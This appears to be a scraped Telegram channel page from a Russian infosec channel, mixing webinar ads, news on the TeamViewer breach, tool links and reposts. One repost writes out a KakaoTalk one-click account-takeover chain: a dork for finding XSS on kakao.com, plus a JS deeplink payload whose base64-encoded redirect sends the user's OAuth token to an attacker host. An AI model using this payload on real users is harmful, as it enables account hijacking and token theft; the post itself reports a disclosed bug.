cookie

Мы используем файлы cookie для улучшения сервиса. Нажав кнопку «Принять все», вы соглашаетесь с использованием cookies.

avatar

S.E.Reborn

Copyright: @SEAdm1n Вакансии: @infosec_work Информационная безопасность. Литература для ИТ специалистов. Пентест, Хакинг, OSINT, СИ, DevOps, Администрирование. Сотрудничество - @SEAdm1n

Больше
Рекламные посты
22 292
Подписчики
+1024 часа
+97 дней
-430 дней

Загрузка данных...

Прирост подписчиков

Загрузка данных...

Фото недоступноПоказать в Telegram
«PT NGFW за стеклом». Этап № 6. IPS и экспертиза 4 июля в 14:00 Мы продолжаем развенчивать мифы вокруг IPS. Сегодня затронем тему экспертизы — той самой, о которой говорят все, но никто не знает, что скрывается за этим словом. Алексей Леднев, руководитель отдела обнаружения атак PT ESC, расскажет о подходе Positive Technologies к созданию сигнатур IPS. Поделится инсайтами, как проверять качество выявления сетевых атак, и ответит на самый острый вопрос: так ли важно количество сигнатур, которыми хвастаются производители NGFW. Не переставайте задавать вопросы и пытаться загнать нас в тупик — это помогает нам создавать классный продукт. Ждем вас!
Показать все...
😁 1
Зарегистрироваться
Repost from SecAtor
Хакеры развальцевали корпоративную сеть TeamViewer, о чем 26 июня сообщил сам разработчик решения для удаленного доступа с 640 000 клиентов и 2,5 млрд установок, обнаружив сбой во внутренней ИТ-среде. Новость о взломе впервые появилась на Mastodon, где исследователь поделился фрагментами оповещения с Dutch Digital Trust Center (портал обмена информацией по киберугрозам). По словам компании, это сделала неустановленная хакерская группа APT, начато расследование совместно с командой всемирно известных экспертов по кибербезопасности. При этом отмечается, что внутренняя корпоративная ИТ-среда TeamViewer полностью независима от среды продукта. Нет никаких доказательств того, что среда продукта или данные клиентов затронуты. Компания планирует обеспечить прозрачность информации об утечке и будет постоянно обновлять статус своего расследования по мере поступления новой информации. Тем не менее, как заметили исследователи, страница c обновлением ИТ-безопасности TeamViewer содержит <meta name="robots" content="noindex"> тег HTML, который предотвращает индексацию документа поисковыми системами. В прошлый раз TeamViewer ломали в 2016 году, тогда инцидент связали с китайскими хакерами из-за использования ими бэкдора Winnti. Тогда компания не раскрывала информацию почти три года, сославшись на то, что данные в ходе атаки не пострадали. Новый инцидент NCC Group на пару с Health-ISAC уже поспешили навесить российским хакерам, аргументируя свою позицию мнением доверенного источника в разведсообществе, который утверждал, что TeamViewer часто используется в их атаках. Однако позже умопомрачительства опровергли, факт инцидента в TeamViewer и задействование его решения в атаках той или иной APT никак не соотносятся между собой (даже логически). Так что пока официальных комментариев на этот счет ни от TeamViewer, ни от NCC Group нет, а все всхлипывания можно считать не более чем пропагандистской залипухой.
Показать все...
Jeffrey (@[email protected])

"The NCC Group Global Threat Intelligence team has been made aware of significant compromise of the TeamViewer remote access and support platform by an APT group. Due to the widespread usage of this software the following alert is being circulated securely to our customers." NCC Group can't disclose the source at the time and keep investigating this. Big source, but no substance. Curious to see how this will work out. ping @[email protected] @screaminggoat

😁 1
Repost from Cybred
01:20
Видео недоступноПоказать в Telegram
1-click Exploit in South Korea's biggest mobile chat app Account Takeover в самом популярном у корейцев мессенджере KakaoTalk. Когда открывается диплинк, в него отправляется OAuth-токен пользователя, но только если домен доверенный, — проблема, и вот как она решается. 1. Находим XSS на домене из белого списка с помощью дорки:
site:*.kakao.com inurl:search -site:developers.kakao.com -site:devtalk.kakao.com
2. Отправляем не подозревающему собеседнику ссылку на свой сайт evil.com, где должен быть размещен следующий JS-код с XSS:
location.href = kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">
Он откроет вебвью, приложение отправит OAuth-токен на домен из белого списка и выполнит XSS с редиректом и токеном на сайт хакера. Баг был отправлен в 2023 году, а выплата составила $0, потому что владельцы приложения выплачивают награды только соотечественникам ¯\_(ツ)_/¯
Показать все...
289096329-7fd439c5-b96b-49d9-b8b5-cd9be2a51fe9.mp44.11 MB
🙉 2 1
⚙️ Awesome PCAP tools. • Объемный репозиторий, который содержит список инструментов для обработки файлов pcap (Packet Capture Data) при исследовании сетевого трафика: • Linux commands;Traffic Capture;Traffic Analysis/Inspection;DNS Utilities;File Extraction;Related Projects. ➡️ https://github.com/caesar0301/awesome-pcaptools #tools
Показать все...
Фото недоступноПоказать в Telegram
🔆 Приглашаем вас на вебинар "Знакомство с MySQL InnoDB Cluster"! 🚀 🧠 Мы разберём все отличия кластерного решения InnoDB Cluster от обычной репликации. Вы узнаете, как настроить и запустить рабочий кластер, получите полное представление о возможностях и ограничениях этого решения. 👍 Наш вебинар станет находкой для системных администраторов Linux, администраторов баз данных (DBA) и всех, кто хочет познакомиться с InnoDB Cluster. Вебинар откроет новые горизонты в администрировании баз данных, позволив понять основные различия архитектуры кластера и традиционной репликации. 🏆 Спикер Николай Лавлинский — технический директор в Метод Лаб, PhD Economic Science, опытный руководитель разработки и преподаватель. ⏰ Занятие пройдёт 04 июля 2024 года в 19:00 по мск в рамках курса «Инфраструктура высоконагруженных систем». Доступна рассрочка на обучение! 👉 Зарегистрируйтесь для участия https://vk.cc/cxS44H Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru
Показать все...
1
👩‍💻 Oracle Linux Monitoring and Logging. • Оказывается, что у Oracle есть плейлист с короткими видео для начинающих, которые освещают различные утилиты для мониторинга информации о состоянии системы (vmstat, iostat, rsyslog ну и т.д.): • System Logging with rsyslog on Oracle Linux;System Logging with logwatch on Oracle Linux;System Logging with journald on Oracle Linux;Using the sosreport Utility on Oracle Linux;Using the iostat Utility on Oracle Linux;Using the mpstat Utility on Oracle Linux;Using the vmstat Utility on Oracle Linux;Using the netstat Utility on Oracle Linux;Using the top Utility on Oracle Linux;Use Gprofng for Performance Profiling Applications;Linux Auditing System on Oracle Linux. #Видео #Linux #Мониторинг
Показать все...
🔥 7 1
Фото недоступноПоказать в Telegram
👨‍💻 Вебинар «Как построить систему развития навыков сотрудников киберзащиты в 2024» Быстрое и правильное реагирование на угрозы информационной безопасности требует актуальных знаний и практической подготовки специалистов. 27 июня в 12:00 наши эксперты наши расскажут, как сделать систему развития и роста кадров в кибербезопасности более прозрачной и эффективной. Вы узнаете: 1. Как создать систему матриц развития навыков сотрудников ИБ. 2. Как измерять рост компетенций сотрудников. 3. Как учитывать индивидуальные цели при разработке планов развития навыков. Присоединяйтесь, будет интересно и полезно! Зарегистрироваться Реклама ООО "РТК ИБ" ИНН 7704356648
Показать все...
Repost from Cybred
HTML entities that create ASCII characters inside a JavaScript URL This vector loops through all entities and assigns them to a JavaScript URL and checks if they decode to ASCII characters.
Показать все...
HTML entities that create ASCII characters inside a JavaScript URL - Shazzer

This vector loops through all entities and assigns them to a JavaScript URL and checks if they decode to ASCII characters.

❤‍🔥 1
Repost from vx-underground
Фото недоступноПоказать в Telegram
😁 16
Выберите другой тариф

Ваш текущий тарифный план позволяет посмотреть аналитику только 5 каналов. Чтобы получить больше, выберите другой план.